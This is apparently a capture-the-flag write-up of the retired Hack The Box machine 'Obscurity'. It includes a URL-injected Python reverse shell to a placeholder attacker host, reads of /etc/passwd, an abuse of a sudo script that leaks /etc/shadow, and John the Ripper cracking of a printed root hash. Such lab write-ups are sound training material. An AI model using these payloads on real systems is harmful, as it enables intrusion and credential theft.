HTB Write-up | Obscurity

Inês Martins -

Retired machine can be found here.

Scanning

After doing an initial scan with nmap, we find that this is a Linux (Ubuntu) machine with 2 exposed services: OpenSSH on port 22 and a custom web server on port 8080.

$ nmap -sC -sV -A obscurity.htb

22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8080/tcp open http-proxy BadHTTPServer
```

There is some content on the website which has some useful information:

So, now we know there is a file called SuperSecureServer.py which is in "the secret development directory". I used wfuzz to find it but you could probably just get it logically:

$ wfuzz -w SecLists/Discovery/Web-Content/api/actions.txt --hc 404 http://obscurity.htb:8080/FUZZ/SuperSecureServer.py

The mystery directory is develop, so know we have access to the server's source code, in the form of a Python script:
While analysing it, we find something interesting:

Here's our foothold: we can exploit this exec and get us a shell as wwwdata.

$ wget http://obscurity.htb:8080/';%20s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('[ATTACKER_IP]',[ATTACKER_PORT]));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);a%20=%20'

Getting user

It seems like our first goal is to become robert.

$ cat etc/passwd
...
robert:x:1000:1000:robert:/home/robert:/bin/bash

Listing the contents of robert's home directory, we get some interesting files:

$ ls /home/robert
BetterSSH/BetterSSH.py
check.txt
out.txt
passwordreminder.txt
SuperSecureCrypt.py
user.txt

$ cat check.txt
Encrypting this file with your key should result in out.txt, make sure your key is correct!

$ cat out.txt
¦ÚÈêÚÞØÛÝ݉×ÐÊß…ÞÊÚÉ’æßÝˈÚÛÚêÙÉëéÑÒÝÍÐ…êÆáÙÞã–ÒшÐáÙ¦ÕæØžãÊÎ́ßÚêÆŽÝáäè‰ÎÍÚŒÎëÑÓäáÛÌ׉v

$ cat passwordreminder.txt
´ÑÈÌÉàÙÁÑ鯷¿

So, by encrypting check.txt with an unknown algorithm we get out.txt.
Also, when use we this key to encrypt robert's password we get the content of
passwordreminder.txt.

This is a classic known-plaintext attack.
Let's create a script to find the key!

Now that we have robert's password we can SSH into the machine, get the user flag and move on to root.

Getting root

We start by doing some enumeration with LinEnum:

$ ./LinEnum.sh...
User robert may run the following commands on obscure:
(ALL) NOPASSWD: /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py
-e

Let's run BetterSSH as sudo to test this:

$ sudo /usr/bin/python3 /home/robert/BetterSSH/BetterSSH.py
Enter username: robert
Enter password: xxx
Authed!

After looking at BetterSSH.py we realise there's a vulnerability we can exploit: we can read the passwords that are stored on /etc/shadow for a period of time on /tmp/SSH/.

So we create a script to print them to a file we can read after the process is finished (/tmp/o.txt):

Finally, we use JohnTheRipper to crack the hash:

$ echo "root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:18226:0:99999:7" > shadow
$ echo "root:x:0:0:root:/root:/bin/bash" > passwd
$ unshadow passwd shadow > crack.password.db
$ john crack.password.db

That's it, hope you enjoyed it!